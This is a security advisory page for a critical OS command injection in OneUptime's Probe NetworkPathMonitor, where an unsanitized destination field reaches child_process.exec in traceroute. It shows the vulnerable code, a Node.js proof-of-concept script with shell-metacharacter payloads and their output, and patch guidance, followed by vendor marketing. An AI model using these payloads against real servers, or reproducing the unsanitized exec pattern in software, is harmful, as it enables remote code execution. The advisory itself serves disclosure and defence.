GHSA-jmhp-5558-qxh5
CRITICALOneUptime: OS Command Injection in Probe NetworkPathMonitor via unsanitized destination in traceroute exec()
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
@oneuptime/commonnpmDescription
Summary
An OS command injection vulnerability in NetworkPathMonitor.performTraceroute() allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor's destination field.
Details
The vulnerability exists in Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts, lines 149–191.
The performTraceroute() method constructs a shell command by directly interpolating the user-controlled destination parameter into a string template, then executes it via child_process.exec() (wrapped through promisify):
// Line 13 — exec imported from child_process
import { exec } from "child_process";
// Line 15-17 — promisified into execAsync
const execAsync = promisify(exec);
// Lines 149-191 — destination is never sanitized
private static async performTraceroute(
destination: string, // ← attacker-controlled
maxHops: number,
timeout: number,
): Promise<TraceRoute> {
// ...
let command: string;
if (isWindows) {
command = `tracert -h ${maxHops} -w ${...} ${destination}`;
} else if (isMac) {
command = `traceroute -m ${maxHops} -w 3 ${destination}`;
} else {
command = `traceroute -m ${maxHops} -w 3 ${destination}`;
}
const tracePromise = execAsync(command); // ← shell execution
The destination value originates from the public trace() method (line 31), which accepts URL | Hostname | IPv4 | IPv6 | string types. When a raw string is passed (line 47: hostAddress = destination), no validation or sanitization is performed before it reaches performTraceroute().
child_process.exec() spawns a shell (/bin/sh), so any shell metacharacters (;, |, $(), ` `, &&, ||, \n) in destination will be interpreted, allowing full command injection.
PoC
- poc.cjs
/**
* PoC: OS Command Injection in OneUptime NetworkPathMonitor
*
* Replicates the exact vulnerable code path from
* Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts:149-191
*/
const { exec } = require("child_process");
const { promisify } = require("util");
const execAsync = promisify(exec);
async function performTraceroute_VULNERABLE(destination, maxHops, timeout) {
const isMac = process.platform === "darwin";
const isWindows = process.platform === "win32";
let command;
if (isWindows) {
command = `tracert -h ${maxHops} -w ${Math.ceil(timeout / 1000) * 1000} ${destination}`;
} else if (isMac) {
command = `traceroute -m ${maxHops} -w 3 ${destination}`;
} else {
command = `traceroute -m ${maxHops} -w 3 ${destination}`;
}
console.log(`[VULN] Constructed command: ${command}`);
try {
const { stdout, stderr } = await execAsync(command);
return { stdout, stderr };
} catch (err) {
return { stdout: err.stdout || "", stderr: err.stderr || err.message };
}
}
async function runPoC() {
console.log("=== Payload 1: Semicolon chaining (;) ===");
console.log(" destination = '127.0.0.1; id'\n");
const r1 = await performTraceroute_VULNERABLE("127.0.0.1; id", 1, 5000);
console.log("[stdout]:", r1.stdout);
console.log("\n=== Payload 2: Pipe injection (|) ===");
console.log(" destination = '127.0.0.1 | whoami'\n");
const r2 = await performTraceroute_VULNERABLE("127.0.0.1 | whoami", 1, 5000);
console.log("[stdout]:", r2.stdout);
console.log("\n=== Payload 3: Subshell execution $() ===");
console.log(" destination = '127.0.0.1$(echo INJECTED)'\n");
const r3 = await performTraceroute_VULNERABLE("127.0.0.1$(echo INJECTED)", 1, 5000);
console.log("[stderr]:", r3.stderr);
}
runPoC().catch(console.error);
- Run the PoC:
node poc.cjs
- Expected output (confirmed on macOS with Node.js v25.2.1):
=== Payload 1: Semicolon chaining (;) ===
destination = '127.0.0.1; id'
[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1; id
[stdout]: 1 localhost (127.0.0.1) 0.215 ms 0.076 ms 0.055 ms
uid=501(dxleryt) gid=20(staff) groups=20(staff),12(everyone)...
=== Payload 2: Pipe injection (|) ===
destination = '127.0.0.1 | whoami'
[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1 | whoami
[stdout]: dxleryt
=== Payload 3: Subshell execution $() ===
destination = '127.0.0.1$(echo INJECTED)'
[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1$(echo INJECTED)
[stderr]: traceroute: unknown host 127.0.0.1INJECTED
The id and whoami commands execute successfully, proving arbitrary command execution. The subshell payload proves inline shell evaluation — $(echo INJECTED) is evaluated and appended to the hostname.
Impact
Vulnerability type: OS Command Injection (CWE-78)
Who is impacted: Any authenticated user with the ability to create or edit a network path monitor in a OneUptime project can execute arbitrary operating system commands on the Probe server(s). In a multi-tenant SaaS deployment, this allows a malicious tenant to:
- Execute arbitrary commands as the Probe service user (Remote Code Execution)
- Read sensitive files from the Probe server (e.g., environment variables, credentials, service account tokens)
- Pivot to internal services accessible from the Probe's network position
- Compromise other tenants' monitoring data if Probes are shared across tenants
- Establish persistent backdoors (reverse shells, cron jobs, SSH keys)
Note: The
NetworkPathMonitorclass is fully implemented and exported but not yet wired into the monitor execution pipeline (no callers import it). The vulnerability will become exploitable once this monitor type is integrated. The code is present in the current codebase and ready to be activated.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | @oneuptime/common | all versions | 10.0.7 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @oneuptime/common. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @oneuptime/common to 10.0.7 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-jmhp-5558-qxh5 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-jmhp-5558-qxh5 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-jmhp-5558-qxh5. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-jmhp-5558-qxh5 in your dependencies?
O3 detects GHSA-jmhp-5558-qxh5 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.